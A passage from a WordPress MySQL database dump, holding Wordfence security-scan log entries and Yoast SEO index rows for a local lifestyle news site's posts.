to get IPs'),(23559,1675048482.213575,10,'info','SUM_ENDOK:Checking for the most secure way to get IPs'),(23560,1675048482.313689,10,'info','SUM_START:Scanning to check available disk space'),(23561,1675048482.334440,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.27 TB'),(23562,1675048482.347115,2,'info','The disk has 3429592.77 MB available'),(23563,1675048482.359875,10,'info','SUM_ENDOK:Scanning to check available disk space'),(23564,1675048482.413271,10,'info','SUM_START:Checking Web Application Firewall status'),(23565,1675048482.446405,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23566,1675048482.515294,10,'info','SUM_START:Checking for future GeoIP support'),(23567,1675048482.545526,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(23568,1675048482.596925,10,'info','SUM_START:Checking for paths skipped due to scan settings'),(23569,1675048482.630565,10,'info','SUM_ENDOK:Checking for paths skipped due to scan settings'),(23570,1675048482.665776,2,'info','Getting plugin list from WordPress'),(23571,1675048482.693325,2,'info','Found 9 plugins'),(23572,1675048482.704462,2,'info','Getting theme list from WordPress'),(23573,1675048482.796711,2,'info','Found 2 themes'),(23574,1675048483.635658,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(23575,1675048484.973505,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(23576,1675048485.041538,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(23577,1675048485.055857,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(23578,1675048485.093427,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(23579,1675048485.106497,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(23580,1675048485.144882,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(23581,1675048485.170689,10,'info','SUM_DISABLED:Skipping theme scan'),(23582,1675048485.182159,10,'info','SUM_DISABLED:Skipping plugin scan'),(23583,1675048485.208959,10,'info','SUM_START:Scanning for known malware files'),(23584,1675048485.268782,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(23585,1675048485.358587,2,'info','500 files indexed'),(23586,1675048485.466829,2,'info','1000 files indexed'),(23587,1675048485.614782,2,'info','1500 files indexed'),(23588,1675048485.725121,2,'info','2000 files indexed'),(23589,1675048485.827946,2,'info','2500 files indexed'),(23590,1675048485.915157,2,'info','3000 files indexed'),(23591,1675048485.972518,2,'info','3500 files indexed'),(23592,1675048486.055716,2,'info','4000 files indexed'),(23593,1675048486.175329,2,'info','4500 files indexed'),(23594,1675048486.295202,2,'info','5000 files indexed'),(23595,1675048486.412806,2,'info','5500 files indexed'),(23596,1675048486.656319,2,'info','6000 files indexed'),(23597,1675048486.953560,2,'info','6500 files indexed'),(23598,1675048486.976525,2,'info','7000 files indexed'),(23599,1675048486.997944,2,'info','7003 files indexed'),(23600,1675048493.030432,2,'info','Analyzed 100 files containing 1.7 MB of data so far'),(23601,1675048498.114990,2,'info','Analyzed 200 files containing 2.9 MB of data so far'),(23602,1675048502.194262,2,'info','Analyzed 300 files containing 4.11 MB of data so far'),(23603,1675048507.949257,2,'info','Analyzed 400 files containing 6.95 MB of data so far'),(23604,1675048512.362905,2,'info','Analyzed 500 files containing 7.86 MB of data so far'),(23605,1675048516.921512,2,'info','Analyzed 600 files containing 8.88 MB of data so far'),(23606,1675048522.037984,2,'info','Analyzed 700 files containing 12.73 MB of data so far'),(23607,1675048528.377762,2,'info','Analyzed 800 files containing 15.15 MB of data so far'),(23608,1675048534.337369,2,'info','Analyzed 900 files containing 18.65 MB of data so far'),(23609,1675048540.197430,2,'info','Analyzed 1000 files containing 20.11 MB of data so far'),(23610,1675048546.045718,2,'info','Analyzed 1100 files containing 21.9 MB of data so far'),(23611,1675048550.501394,2,'info','Analyzed 1200 files containing 28.93 MB of data so far'),(23612,1675048555.694465,2,'info','Analyzed 1300 files containing 31.22 MB of data so far'),(23613,1675048560.740147,2,'info','Analyzed 1400 files containing 32.22 MB of data so far'),(23614,1675048564.749189,2,'info','Analyzed 1500 files containing 33.5 MB of data so far'),(23615,1675048570.340646,2,'info','Analyzed 1600 files containing 33.93 MB of data so far'),(23616,1675048574.665804,2,'info','Analyzed 1700 files containing 34.52 MB of data so far'),(23617,1675048576.960765,2,'info','Analyzed 1800 files containing 34.82 MB of data so far'),(23618,1675048580.056670,2,'info','Analyzed 1900 files containing 35.42 MB of data so far'),(23619,1675048584.962631,2,'info','Analyzed 2000 files containing 38.17 MB of data so far'),(23620,1675048596.912176,2,'info','Analyzed 2100 files containing 41.04 MB of data so far'),(23621,1675048603.618861,2,'info','Analyzed 2200 files containing 41.91 MB of data so far'),(23622,1675048608.174168,2,'info','Analyzed 2300 files containing 42.08 MB of data so far'),(23623,1675048612.860503,2,'info','Analyzed 2400 files containing 42.71 MB of data so far'),(23624,1675048616.948634,2,'info','Analyzed 2500 files containing 43.06 MB of data so far'),(23625,1675048622.110321,2,'info','Analyzed 2600 files containing 43.3 MB of data so far'),(23626,1675048626.795078,2,'info','Analyzed 2700 files containing 43.84 MB of data so far'),(23627,1675048631.630423,2,'info','Analyzed 2800 files containing 44.28 MB of data so far'),(23628,1675048638.242346,2,'info','Analyzed 2900 files containing 45.04 MB of data so far'),(23629,1675048642.934298,2,'info','Analyzed 3000 files containing 45.07 MB of data so far'),(23630,1675048647.112272,2,'info','Analyzed 3100 files containing 45.1 MB of data so far'),(23631,1675048652.256207,2,'info','Analyzed 3200 files containing 47.72 MB of data so far'),(23632,1675048657.184166,2,'info','Analyzed 3300 files containing 50.22 MB of data so far'),(23633,1675048662.643392,2,'info','Analyzed 3400 files containing 51.09 MB of data so far'),(23634,1675048668.220659,2,'info','Analyzed 3500 files containing 54.9 MB of data so far'),(23635,1675048673.058806,2,'info','Analyzed 3600 files containing 57.97 MB of data so far'),(23636,1675048677.701759,2,'info','Analyzed 3700 files containing 60.05 MB of data so far'),(23637,1675048684.288103,2,'info','Analyzed 3800 files containing 61.39 MB of data so far'),(23638,1675048688.559279,2,'info','Analyzed 3900 files containing 61.69 MB of data so far'),(23639,1675048695.514616,2,'info','Analyzed 4000 files containing 62.87 MB of data so far'),(23640,1675048701.514898,2,'info','Analyzed 4100 files containing 68.58 MB of data so far'),(23641,1675048706.616046,2,'info','Analyzed 4200 files containing 69.29 MB of data so far'),(23642,1675048711.835414,2,'info','Analyzed 4300 files containing 69.65 MB of data so far'),(23643,1675048717.603811,2,'info','Analyzed 4400 files containing 69.87 MB of data so far'),(23644,1675048721.911795,2,'info','Analyzed 4500 files containing 70.14 MB of data so far'),(23645,1675048725.900727,2,'info','Analyzed 4600 files containing 70.44 MB of data so far'),(23646,1675048731.406028,2,'info','Analyzed 4700 files containing 70.59 MB of data so far'),(23647,1675048737.458932,2,'info','Analyzed 4800 files containing 70.85 MB of data so far'),(23648,1675048743.479078,2,'info','Analyzed 4900 files containing 71.82 MB of data so far'),(23649,1675048750.238304,2,'info','Analyzed 5000 files containing 74.14 MB of data so far'),(23650,1675048757.610874,2,'info','Analyzed 5100 files containing 76.62 MB of data so far'),(23651,1675048764.159601,2,'info','Analyzed 5200 files containing 78.4 MB of data so far'),(23652,1675048769.122709,2,'info','Analyzed 5300 files containing 80.15 MB of data so far'),(23653,1675048774.842502,2,'info','Analyzed 5400 files containing 93.74 MB of data so far'),(23654,1675048780.542332,2,'info','Analyzed 5500 files containing 97.15 MB of data so far'),(23655,1675048784.961166,2,'info','Analyzed 5600 files containing 99.37 MB of data so far'),(23656,1675048790.468222,2,'info','Analyzed 5700 files containing 102.25 MB of data so far'),(23657,1675048796.783025,2,'info','Analyzed 5800 files containing 105.2 MB of data so far'),(23658,1675048803.759819,2,'info','Analyzed 5900 files containing 106.44 MB of data so far'),(23659,1675048809.784984,2,'info','Analyzed 6000 files containing 108.09 MB of data so far'),(23660,1675048816.522862,2,'info','Analyzed 6100 files containing 110.17 MB of data so far'),(23661,1675048823.712136,2,'info','Analyzed 6200 files containing 112.45 MB of data so far'),(23662,1675048830.422475,2,'info','Analyzed 6300 files containing 113.58 MB of data so far'),(23663,1675048836.484262,2,'info','Analyzed 6400 files containing 124.35 MB of data so far'),(23664,1675048843.323319,2,'info','Analyzed 6500 files containing 128.87 MB of data so far'),(23665,1675048849.603263,2,'info','Analyzed 6600 files containing 130.6 MB of data so far'),(23666,1675048855.333983,2,'info','Analyzed 6700 files containing 132.28 MB of data so far'),(23667,1675048863.376185,2,'info','Analyzed 6800 files containing 136.75 MB of data so far'),(23668,1675048869.533486,2,'info','Analyzed 6900 files containing 137.93 MB of data so far'),(23669,1675048876.527912,2,'info','Analyzed 7000 files containing 139.7 MB of data so far'),(23670,1675048876.672477,2,'info','Analyzed 7003 files containing 139.74 MB of data.'),(23671,1675048876.691758,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(23672,1675048876.728715,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(23673,1675048876.764882,10,'info','SUM_ENDOK:Scanning for known malware files'),(23674,1675048876.811474,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(23675,1675048876.843926,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(23676,1675048876.895830,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(23677,1675048876.926973,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(23678,1675048878.471639,2,'info','Starting scan of file contents'),(23679,1675048879.512459,2,'info','Scanned contents of 17 additional files at 16.87 per second'),(23680,1675048880.539911,2,'info','Scanned contents of 30 additional files at 14.74 per second'),(23681,1675048881.561331,2,'info','Scanned contents of 47 additional files at 15.38 per second'),(23682,1675048882.652913,2,'info','Scanned contents of 67 additional files at 16.15 per second'),(23683,1675048883.685774,2,'info','Scanned contents of 78 additional files at 15.05 per second'),(23684,1675048884.686252,2,'info','Scanned contents of 97 additional files at 15.69 per second'),(23685,1675048885.704393,2,'info','Scanned contents of 115 additional files at 15.97 per second'),(23686,1675048886.871385,2,'info','Scanned contents of 132 additional files at 15.78 per second'),(23687,1675048887.874473,2,'info','Scanned contents of 149 additional files at 15.90 per second'),(23688,1675048888.904673,2,'info','Scanned contents of 165 additional files at 15.87 per second'),(23689,1675048889.905984,2,'info','Scanned contents of 177 additional files at 15.52 per second'),(23690,1675048891.090104,2,'info','Scanned contents of 178 additional files at 14.14 per second'),(23691,1675048892.143542,2,'info','Scanned contents of 188 additional files at 13.78 per second'),(23692,1675048894.234075,2,'info','Scanned contents of 194 additional files at 12.33 per second'),(23693,1675048895.609002,2,'info','Scanned contents of 199 additional files at 11.63 per second'),(23694,1675048896.678261,2,'info','Scanned contents of 203 additional files at 11.17 per second'),(23695,1675048897.909013,2,'info','Scanned contents of 205 additional files at 10.56 per second'),(23696,1675048898.943343,2,'info','Scanned contents of 215 additional files at 10.52 per second'),(23697,1675048899.956355,2,'info','Scanned contents of 225 additional files at 10.49 per second'),(23698,1675048901.050726,2,'info','Scanned contents of 241 additional files at 10.69 per second'),(23699,1675048902.070478,2,'info','Scanned contents of 256 additional files at 10.86 per second'),(23700,1675048903.154706,2,'info','Scanned contents of 273 additional files at 11.08 per second'),(23701,1675048904.156484,2,'info','Scanned contents of 289 additional files at 11.27 per second'),(23702,1675048905.206016,2,'info','Scanned contents of 313 additional files at 11.72 per second'),(23703,1675048906.928417,2,'info','Scanned contents of 326 additional files at 11.47 per second'),(23704,1675048907.967835,2,'info','Scanned contents of 341 additional files at 11.57 per second'),(23705,1675048908.978625,2,'info','Scanned contents of 356 additional files at 11.68 per second'),(23706,1675048910.013177,2,'info','Scanned contents of 365 additional files at 11.58 per second'),(23707,1675048911.132517,2,'info','Scanned contents of 383 additional files at 11.74 per second'),(23708,1675048912.246052,2,'info','Scanned contents of 404 additional files at 11.97 per second'),(23709,1675048913.249619,2,'info','Scanned contents of 423 additional files at 12.17 per second'),(23710,1675048914.323619,2,'info','Scanned contents of 434 additional files at 12.12 per second'),(23711,1675048915.350841,2,'info','Scanned contents of 448 additional files at 12.16 per second'),(23712,1675048916.365058,2,'info','Scanned contents of 461 additional files at 12.18 per second'),(23713,1675048917.698145,2,'info','Scanned contents of 476 additional files at 12.14 per second'),(23714,1675048918.763816,2,'info','Scanned contents of 492 additional files at 12.22 per second'),(23715,1675048919.768848,2,'info','Scanned contents of 513 additional files at 12.43 per second'),(23716,1675048920.812650,2,'info','Scanned contents of 532 additional files at 12.57 per second'),(23717,1675048921.886699,2,'info','Scanned contents of 548 additional files at 12.63 per second'),(23718,1675048922.976561,2,'info','Scanned contents of 549 additional files at 12.34 per second'),(23719,1675048923.983197,2,'info','Scanned contents of 562 additional files at 12.36 per second'),(23720,1675048924.983260,2,'info','Scanned contents of 580 additional files at 12.48 per second'),(23721,1675048926.011381,2,'info','Scanned contents of 597 additional files at 12.57 per second'),(23722,1675048927.110576,2,'info','Scanned contents of 613 additional files at 12.61 per second'),(23723,1675048928.113386,2,'info','Scanned contents of 631 additional files at 12.72 per second'),(23724,1675048929.162984,2,'info','Scanned contents of 651 additional files at 12.85 per second'),(23725,1675048930.181522,2,'info','Scanned contents of 664 additional files at 12.85 per second'),(23726,1675048931.639373,2,'info','Scanned contents of 677 additional files at 12.74 per second'),(23727,1675048932.688228,2,'info','Scanned contents of 682 additional files at 12.59 per second'),(23728,1675048933.825511,2,'info','Scanned contents of 688 additional files at 12.44 per second'),(23729,1675048934.856079,2,'info','Scanned contents of 705 additional files at 12.51 per second'),(23730,1675048935.858871,2,'info','Scanned contents of 724 additional files at 12.62 per second'),(23731,1675048936.925434,2,'info','Scanned contents of 738 additional files at 12.63 per second'),(23732,1675048939.067282,2,'info','Scanned contents of 752 additional files at 12.42 per second'),(23733,1675048940.081285,2,'info','Scanned contents of 770 additional files at 12.50 per second'),(23734,1675048941.159281,2,'info','Scanned contents of 787 additional files at 12.56 per second'),(23735,1675048942.185694,2,'info','Scanned contents of 802 additional files at 12.59 per second'),(23736,1675048943.199410,2,'info','Scanned contents of 819 additional files at 12.66 per second'),(23737,1675048944.233445,2,'info','Scanned contents of 836 additional files at 12.72 per second'),(23738,1675048945.254386,2,'info','Scanned contents of 853 additional files at 12.78 per second'),(23739,1675048946.295659,2,'info','Scanned contents of 871 additional files at 12.85 per second'),(23740,1675048947.346602,2,'info','Scanned contents of 889 additional files at 12.91 per second'),(23741,1675048948.374274,2,'info','Scanned contents of 901 additional files at 12.90 per second'),(23742,1675048949.332434,2,'info','Scanned contents of 916 additional files at 12.93 per second'),(23743,1675048949.373987,2,'info','Asking Wordfence to check URLs against malware list.'),(23744,1675048949.385964,2,'info','Checking 2101 host keys against Wordfence scanning servers.'),(23745,1675048950.019494,2,'info','Done host key check.'),(23746,1675048950.288653,2,'info','Done file contents scan'),(23747,1675048950.339994,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(23748,1675048950.487772,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(23749,1675048950.607589,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(23750,1675048950.639697,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(23751,1675048950.717299,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(23752,1675048951.554570,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(23753,1675048951.561795,2,'info','Checking 323 host keys against Wordfence scanning servers.'),(23754,1675048952.169419,2,'info','Done host key check.'),(23755,1675048952.174342,2,'info','Done examining URLs'),(23756,1675048952.332662,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(23757,1675048952.429470,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(23758,1675048953.005093,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(23759,1675048953.054775,10,'info','SUM_START:Scanning for weak passwords'),(23760,1675048953.085508,2,'info','Starting password strength check on 1 user.'),(23761,1675048953.188527,10,'info','SUM_ENDOK:Scanning for weak passwords'),(23762,1675048953.244750,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23763,1675048956.344052,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23764,1675048956.396818,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(23765,1675048957.043905,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(23766,1675048957.109012,10,'info','SUM_START:Scanning for suspicious site options'),(23767,1675048957.299300,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(23768,1675048957.316347,2,'info','Done examining URLs'),(23769,1675048957.519563,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(23770,1675048957.580754,1,'info','-------------------'),(23771,1675048957.595274,2,'info','Wordfence used 24.17 MB of memory for scan. Server peak memory usage was: 56.17 MB'),(23772,1675048957.605558,1,'info','Scan Complete. Scanned 7003 files, 10 plugins, 2 themes, 45 posts, 0 comments and 2937 URLs in 8 minutes 4 seconds.'),(23773,1675048957.615948,10,'info','SUM_FINAL:Scan complete. You have 1006 new issues to fix. See below.'),(23774,1675073528.793916,10,'info','SUM_PREP:Preparing a new scan.'),(23775,1675073528.813188,1,'info','Initiating quick scan'),(23776,1675073528.847403,10,'info','SUM_START:Checking Web Application Firewall status'),(23777,1675073528.858435,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23778,1675073528.893590,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23779,1675073529.080138,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23780,1675073529.101993,1,'info','-------------------'),(23781,1675073529.122600,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 4 MB'),(23782,1675073529.133057,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23783,1675073529.143935,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.'),(23784,1675160550.866655,10,'info','SUM_PREP:Preparing a new scan.'),(23785,1675160550.998647,1,'info','Initiating quick scan'),(23786,1675160551.053285,10,'info','SUM_START:Checking Web Application Firewall status'),(23787,1675160551.132596,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23788,1675160551.255026,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23789,1675160552.532853,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23790,1675160552.601278,1,'info','-------------------'),(23791,1675160552.666433,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 32 MB'),(23792,1675160552.779202,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23793,1675160552.810208,10,'info','SUM_FINAL:Scan complete. You have 9 new issues to fix. See below.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wftrafficrates`
--

DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wftrafficrates`
--

LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_indexable`
--

DROP TABLE IF EXISTS `wp_yoast_indexable`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_indexable` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `permalink` longtext DEFAULT NULL,
  `permalink_hash` varchar(40) DEFAULT NULL,
  `object_id` bigint(20) DEFAULT NULL,
  `object_type` varchar(32) NOT NULL,
  `object_sub_type` varchar(32) DEFAULT NULL,
  `author_id` bigint(20) DEFAULT NULL,
  `post_parent` bigint(20) DEFAULT NULL,
  `title` text DEFAULT NULL,
  `description` mediumtext DEFAULT NULL,
  `breadcrumb_title` text DEFAULT NULL,
  `post_status` varchar(20) DEFAULT NULL,
  `is_public` tinyint(1) DEFAULT NULL,
  `is_protected` tinyint(1) DEFAULT 0,
  `has_public_posts` tinyint(1) DEFAULT NULL,
  `number_of_pages` int(11) unsigned DEFAULT NULL,
  `canonical` longtext DEFAULT NULL,
  `primary_focus_keyword` varchar(191) DEFAULT NULL,
  `primary_focus_keyword_score` int(3) DEFAULT NULL,
  `readability_score` int(3) DEFAULT NULL,
  `is_cornerstone` tinyint(1) DEFAULT 0,
  `is_robots_noindex` tinyint(1) DEFAULT 0,
  `is_robots_nofollow` tinyint(1) DEFAULT 0,
  `is_robots_noarchive` tinyint(1) DEFAULT 0,
  `is_robots_noimageindex` tinyint(1) DEFAULT 0,
  `is_robots_nosnippet` tinyint(1) DEFAULT 0,
  `twitter_title` text DEFAULT NULL,
  `twitter_image` longtext DEFAULT NULL,
  `twitter_description` longtext DEFAULT NULL,
  `twitter_image_id` varchar(191) DEFAULT NULL,
  `twitter_image_source` text DEFAULT NULL,
  `open_graph_title` text DEFAULT NULL,
  `open_graph_description` longtext DEFAULT NULL,
  `open_graph_image` longtext DEFAULT NULL,
  `open_graph_image_id` varchar(191) DEFAULT NULL,
  `open_graph_image_source` text DEFAULT NULL,
  `open_graph_image_meta` mediumtext DEFAULT NULL,
  `link_count` int(11) DEFAULT NULL,
  `incoming_link_count` int(11) DEFAULT NULL,
  `prominent_words_version` int(11) unsigned DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  `language` varchar(32) DEFAULT NULL,
  `region` varchar(32) DEFAULT NULL,
  `schema_page_type` varchar(64) DEFAULT NULL,
  `schema_article_type` varchar(64) DEFAULT NULL,
  `has_ancestors` tinyint(1) DEFAULT 0,
  `estimated_reading_time_minutes` int(11) DEFAULT NULL,
  `version` int(11) DEFAULT 1,
  `object_last_modified` datetime DEFAULT NULL,
  `object_published_at` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `object_type_and_sub_type` (`object_type`,`object_sub_type`),
  KEY `object_id_and_type` (`object_id`,`object_type`),
  KEY `permalink_hash_and_object_type` (`permalink_hash`,`object_type`),
  KEY `subpages` (`post_parent`,`object_type`,`post_status`,`object_id`),
  KEY `prominent_words` (`prominent_words_version`,`object_type`,`object_sub_type`,`post_status`),
  KEY `published_sitemap_index` (`object_published_at`,`is_robots_noindex`,`object_type`,`object_sub_type`)
) ENGINE=InnoDB AUTO_INCREMENT=56 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_indexable`
--

LOCK TABLES `wp_yoast_indexable` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable` DISABLE KEYS */;
INSERT INTO `wp_yoast_indexable` VALUES (1,'https://www.dailyjolly.co.uk/','29:175cfe5ce6b3ad425353c6ec021142b9',NULL,'home-page',NULL,NULL,NULL,'%%sitename%% %%page%% %%sep%% %%sitedesc%%','Your Local News Site','Home',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,'%%sitename%%','','','0',NULL,NULL,NULL,NULL,NULL,'2022-04-13 10:19:07','2022-04-13 10:48:42',1,NULL,NULL,NULL,NULL,0,NULL,2,'2021-08-24 11:56:19','2017-10-17 08:30:43'),(2,'https://www.dailyjolly.co.uk/blog/author/dailyjolly','51:586f2c05b17b9c5feea2e47893f6ae9e',1,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/7754a38a98952427f0cc36a505665492?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/7754a38a98952427f0cc36a505665492?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2022-04-13 10:20:54','2022-04-13 10:48:42',1,NULL,NULL,NULL,NULL,0,NULL,2,'2021-08-24 11:56:19','2017-08-22 07:53:49'),(3,'https://www.dailyjolly.co.uk/blog/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today','103:6eddc451c06aa73f03c3c5c3fdfb3b17',38,'post','post',1,0,NULL,NULL,'Are you going to a festival in the summer of 2018? Read our tips today!','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg',NULL,'167','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg','167','featured-image','{\"width\":960,\"height\":640,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/summer-makeup.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/summer-makeup.jpg\",\"size\":\"full\",\"id\":167,\"alt\":\"Summer makeup tips\",\"pixels\":614400,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 10:20:54','2022-04-13 10:48:51',1,NULL,NULL,NULL,NULL,0,NULL,2,'2018-03-21 10:00:47','2017-10-17 08:30:53'),(4,'https://www.dailyjolly.co.uk/blog/the-fundamentals-in-party-planning','68:8e709e6adc62f36c5eb117b4c496507e',200,'post','post',1,0,NULL,NULL,'The Fundamentals in Party Planning','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2019/05/party-hire-perth.jpg',NULL,'201','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2019/05/party-hire-perth.jpg','201','featured-image','{\"width\":960,\"height\":639,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2019/05/party-hire-perth.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2019/05/party-hire-perth.jpg\",\"size\":\"full\",\"id\":201,\"alt\":\"party-hire-perth\",\"pixels\":613440,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 10:48:42','2022-04-13 10:48:42',1,NULL,NULL,NULL,NULL,0,NULL,2,'2019-05-31 15:21:19','2019-05-31 11:32:40'),(5,'https://www.dailyjolly.co.uk/blog/are-you-training-for-the-blue-mile-check-out-our-tips','87:133a01f3b7f71c6ce256af512585252c',30,'post','post',1,0,NULL,NULL,'Are you training for the Blue Mile? Check out our tips','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/daffodils.jpg',NULL,'141','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/daffodils.jpg','141','featured-image','{\"width\":2500,\"height\":1664,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/daffodils.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/daffodils.jpg\",\"size\":\"full\",\"id\":141,\"alt\":\"\",\"pixels\":4160000,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 10:48:46','2022-04-13 10:48:46',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-10-17 08:36:03','2017-10-17 08:31:40'),(6,'https://www.dailyjolly.co.uk/blog/bee-clever-lands-at-the-eden-project','70:1d30e33d0fdfb9c416b8e74c7ec11ea8',28,'post','post',1,0,NULL,NULL,'What&#8217;s new at the Eden Project?','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1419.jpg',NULL,'123','featured-image',NULL,NULL,'https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1419.jpg','123','featured-image','{\"width\":1600,\"height\":1200,\"url\":\"https://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1419.jpg\",\"path\":\"/home/dailyjolly.co.uk/public_html/wp-content/uploads/2017/10/backgroundpaper1419.jpg\",\"size\":\"full\",\"id\":123,\"alt\":\"\",\"pixels\":1920000,\"type\":\"image/jpeg\"}',NULL,NULL,NULL,'2022-04-13 10:48:48','2022-04-13 10:48:48',1,NULL,NULL,NULL,NULL,0,NULL,2,'2017-10-17 08:37:34','2017-10-17 08:31:34'),(7,'https://www.dailyjolly.co.uk/blog/something-to-think-about-when-cleaning-the-toilet','83:bbf93b286c4cb3698693cdd5025dd478',33,'post','post',1,0,NULL,NULL,'What should you be thinking about when cleaning the 